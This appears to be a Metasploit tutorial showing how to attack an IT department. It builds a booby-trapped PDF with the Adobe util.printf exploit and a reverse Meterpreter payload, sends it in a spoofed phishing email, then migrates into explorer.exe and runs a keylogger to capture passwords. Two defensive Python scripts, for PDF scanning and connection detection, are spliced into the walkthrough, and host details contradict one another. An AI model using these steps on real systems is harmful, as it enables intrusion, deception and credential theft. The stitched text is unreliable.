MSF Binary Client Exploits

In this article, we will examine the client-side exploits for Windows and Linux.

Client-Side Exploits

In our previous articles, we have seen client-side exploits used for Windows and Linux. In this article, I want to look at another scenario.

Let’s assume that after a successful information-gathering phase, we have reached the following conclusions about an IT company. The company:

  1. The systems they use are state-of-the-art.

  2. The IT department’s e-mail address: itdept@victim.com

Now, in this case, we want to reach a computer in the IT department and run a keylogger on it. In this way, it will be possible to obtain useful information by recording the keys pressed on the keyboard.

Let’s run Metasploit Framework with the msfconsole command. Let’s prepare a PDF document that will attract the IT department’s attention and that they will want to open and read. Remember that the document should have a security-related and logical title. It should also not be detected as malicious by antivirus software.

To prepare such a PDF document, we will use the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability. For this, let’s load the exploit/windows/fileformat/adobe_utilprintf module.

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options (exploit/windows/fileformat/adobe_utilprintf):

   Name      Current Setting                        Required  Description
   ----      ---------------                        --------  -----------
   FILENAME  BestComputers-UpgradeInstructions.pdf  yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.128    yes       The listen address
   LPORT     4455             yes       The listening port

Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)

As can be seen from the output, the FILENAME variable, that is, the name of the generated file, can be set as you wish. In the Payload section, LHOST and LPORT must be set to the address and port of our own machine, which will listen for the incoming connection. Then, let’s run the module with the exploit command.

msf exploit(adobe_utilprintf) > exploit

[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] BestComputers-UpgradeInstructions.pdf stored at /root/.msf4/local/BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) >

As you can see, the PDF file was created in /root/.msf4/local/. Let’s copy it to the /tmp folder for easy access. Before sending the file to the target e-mail address, we need to start a listener on our computer; for this we use the exploit/multi/handler module. Make sure that the LHOST and LPORT values are the same as the values given when the PDF file was created.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Once the listener is running, the PDF file has to be delivered to itdept@victim.com. You can do this with the sample command below; other methods of sending e-mail can be used as well. The command is provided only as an example.

root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Best Computers Tech Support
Aug 24 17:32:51 kali sendEmail[13144]: Message input complete.
Aug 24 17:32:51 kali sendEmail[13144]: Email was sent successfully!

Let’s briefly explain the parameters used in this example command.

-t: TO, the recipient address.
-f: FROM, the sender address.
-s: the IP address of the SMTP server.
-u: TITLE, the subject of the mail.
-a: ATTACHMENT, the attached file.

After typing the command and pressing ENTER, you can write the body text of the e-mail. When the text is complete, press CTRL+D to finish the input, and the mail is sent to the recipient address.

When the recipient receives the mail and checks the attachment with an antivirus program, the scan comes back clean; but when the file is opened, even if only a blank page is shown, a connection back to the listening computer is established.
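The sentence above depends on a signature scanner returning a clean result. A content check on the attachment itself looks instead for the features such a document must have, whatever its signature. The following is an added example written for this article, not code from Metasploit or from the original author: it parses a constructed .eml message, pulls out each attachment that is a PDF by magic bytes (not by declared type or extension), inflates Flate-compressed streams so that script hidden inside them is also searched, and flags the combination of embedded JavaScript, an auto-run action (/OpenAction or /AA) and a util.printf() call. The sample PDFs, the indicator list and the severity tiers are assumptions for illustration; the util.printf call in the sample is a harmless placeholder, not an exploit string.

```python
"""Attachment check for PDFs carrying auto-run JavaScript (added example)."""
import email
import email.policy
import re
import zlib
from email.message import EmailMessage

# Constructed sample: the /OpenAction runs a JavaScript string that mentions
# util.printf. The call is harmless; only the pattern matters here.
SAMPLE_JS = b'util.printf("%d", 1);'
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (" + SAMPLE_JS + b") >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

def build_compressed_pdf(js: bytes) -> bytes:
    """Constructed variant: the script sits in a Flate-compressed stream, so a
    plain grep of the file for 'util.printf' finds nothing."""
    body = zlib.compress(js)
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
        b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n"
        b"5 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + body + b"\nendstream endobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )

# Assumed indicator set: what a document needs in order to run script on its own.
INDICATORS = {
    "/JavaScript": re.compile(rb"/JavaScript\b"),
    "/JS": re.compile(rb"/JS\b"),
    "/OpenAction": re.compile(rb"/OpenAction\b"),
    "/AA": re.compile(rb"/AA\b"),  # additional actions, fired by viewer events
    "util.printf": re.compile(rb"util\.printf\s*\("),
}
# Direct /Length values only; indirect lengths ("/Length 6 0 R") need a real parser.
STREAM_RE = re.compile(rb"/Length\s+(\d+)[^>]*>>\s*stream\r?\n")

def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of each Flate stream to the raw bytes, so the
    keyword search also covers compressed content. Other filters are skipped."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        raw = data[m.end():m.end() + int(m.group(1))]
        try:
            inflated.append(zlib.decompress(raw))
        except zlib.error:
            continue
    return data + b"\n" + b"\n".join(inflated)

def scan_pdf(data: bytes) -> tuple[str, list[str]]:
    """Return (verdict, indicators). Tiers are an assumption: script + auto-run +
    util.printf -> block; script + auto-run -> quarantine; script -> review."""
    text = inflate_streams(data)
    found = [name for name, rx in INDICATORS.items() if rx.search(text)]
    has_js = "/JavaScript" in found or "/JS" in found
    auto_run = "/OpenAction" in found or "/AA" in found
    if has_js and auto_run and "util.printf" in found:
        return "block", found
    if has_js and auto_run:
        return "quarantine", found
    if has_js:
        return "review", found
    return "clean", found

def build_sample_eml(pdf: bytes) -> bytes:
    """Constructed message mirroring the article's sendEmail call."""
    msg = EmailMessage()
    msg["From"] = "techsupport@bestcomputers.com"
    msg["To"] = "itdept@victim.com"
    msg["Subject"] = "Important Upgrade Instructions"
    msg.set_content("IT Dept,\n\nPlease read the attached instructions.\n")
    msg.add_attachment(pdf, maintype="application", subtype="pdf",
                       filename="BestComputers-UpgradeInstructions.pdf")
    return msg.as_bytes()

def scan_message(raw: bytes) -> list[tuple[str, str, list[str]]]:
    """Scan every attachment that is a PDF by magic bytes (a renamed .pdf still
    opens in the reader); returns (filename, verdict, indicators) per PDF."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    results = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True)
        if not payload or not payload.lstrip().startswith(b"%PDF"):
            continue
        verdict, found = scan_pdf(payload)
        results.append((part.get_filename() or "<unnamed>", verdict, found))
    return results

if __name__ == "__main__":
    for pdf in (SAMPLE_PDF, build_compressed_pdf(SAMPLE_JS)):
        for name, verdict, found in scan_message(build_sample_eml(pdf)):
            print(f"{name}: {verdict} {found}")
```

Run stand-alone, the script reports "block" for both the plain and the compressed sample. The compressed case is the one worth noting: without inflate_streams the util.printf indicator is missed and the document drops to "quarantine", which is why a gateway check has to look inside stream objects rather than at the raw file only.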

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)

meterpreter >

As you can see, when the PDF file is opened, the Meterpreter shell is opened. Now it is possible to run various commands on the other party’s computer. Finally, it is possible to record keystrokes by running the post/windows/capture/keylog_recorder module.

meterpreter > ps

Process list
============

 PID   Name            Path
 ---   ----            ----
 852   taskeng.exe     C:\Windows\system32\taskeng.exe
 1308  Dwm.exe         C:\Windows\system32\Dwm.exe
 1520  explorer.exe    C:\Windows\explorer.exe
 2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2196  VMwareUser.exe  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
 3452  AcroRd32.exe    C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
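Seen from the defender's side, the listings above describe an unusual pairing: the session is first served from AcroRd32.exe, the reader process in the ps output, and is connected to 192.168.8.128:4455, a port no document viewer needs; after the migrate module runs, the same peer is served from explorer.exe instead. The following is an added example, not code from the article or from Metasploit: two rules run over constructed connection records (the record layout is an assumption standing in for Sysmon event 3, EDR telemetry or netstat -b output), flagging a document reader connected to a non-web port and then any other process that shares that reader's remote endpoint, which is how the session would appear once it has moved into another process. The reader list and the web-port allowance are assumptions to tune per environment.

```python
"""Host-side rule: a document reader with an outbound connection to an
arbitrary port, plus processes that share that peer (added example)."""
from dataclasses import dataclass

# Assumed list of processes that render documents and have no business
# talking to arbitrary remote ports.
DOCUMENT_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe",
                    "winword.exe", "excel.exe", "powerpnt.exe"}
WEB_PORTS = {80, 443}  # update checks and the like are expected on these

@dataclass(frozen=True)
class Connection:
    """One established TCP connection with its owning process. The layout is an
    assumption standing in for Sysmon event 3, EDR telemetry or netstat -b."""
    pid: int
    image: str
    remote_ip: str
    remote_port: int

# Constructed records shaped after the article: the reader calling back to
# the handler on 192.168.8.128:4455, and Explorer.EXE (816) holding the same
# peer after the migration shown above. Other rows are background traffic.
SAMPLE_CONNECTIONS = [
    Connection(3176, "iexplore.exe", "198.51.100.10", 443),
    Connection(3452, "AcroRd32.exe", "192.168.8.128", 4455),
    Connection(816, "Explorer.EXE", "192.168.8.128", 4455),
    Connection(3452, "AcroRd32.exe", "198.51.100.20", 443),
    Connection(2196, "VMwareUser.exe", "192.168.8.1", 902),
]

def find_suspicious(conns: list[Connection]) -> list[tuple[str, int, str]]:
    """Return (image, pid, reason) for each suspicious connection.
    Rule 1: a document reader connected to a non-web port.
    Rule 2: any other process connected to the same remote endpoint as a
    rule-1 hit, so the finding survives the session leaving the reader."""
    alerts = []
    flagged_peers = set()
    for c in conns:
        if c.image.lower() in DOCUMENT_READERS and c.remote_port not in WEB_PORTS:
            alerts.append((c.image, c.pid,
                           f"document reader connected to {c.remote_ip}:{c.remote_port}"))
            flagged_peers.add((c.remote_ip, c.remote_port))
    for c in conns:
        if ((c.remote_ip, c.remote_port) in flagged_peers
                and c.image.lower() not in DOCUMENT_READERS):
            alerts.append((c.image, c.pid,
                           f"shares peer {c.remote_ip}:{c.remote_port} "
                           f"with a flagged reader connection"))
    return alerts

if __name__ == "__main__":
    for image, pid, reason in find_suspicious(SAMPLE_CONNECTIONS):
        print(f"[!] {image} ({pid}): {reason}")
```

On the sample records the rules produce two alerts, AcroRd32.exe (3452) and Explorer.EXE (816), while the reader's own HTTPS connection and the browser traffic pass. The second rule is what keeps the detection useful after the migrate step: the reader may be closed or idle by then, but the peer it first contacted is already known.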

meterpreter > sysinfo
Computer: OFFSEC-PC
OS: Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

You can check the recorded keys from the contents of the file 20110323091836_default_192.168.1.195_host.windows.key_832155.txt.

root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support, I tried to open his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to open. I turned on the rmote access server so you can log in to fix this problem. Our user name is admin and password for that session is 123456. Call or email when you are done. Thanks IT Dept

As can be seen, the IT employee unknowingly revealed in his keystrokes that his username was admin and his password was 123456.


Last modified 17.01.2025: new translations (f32b526)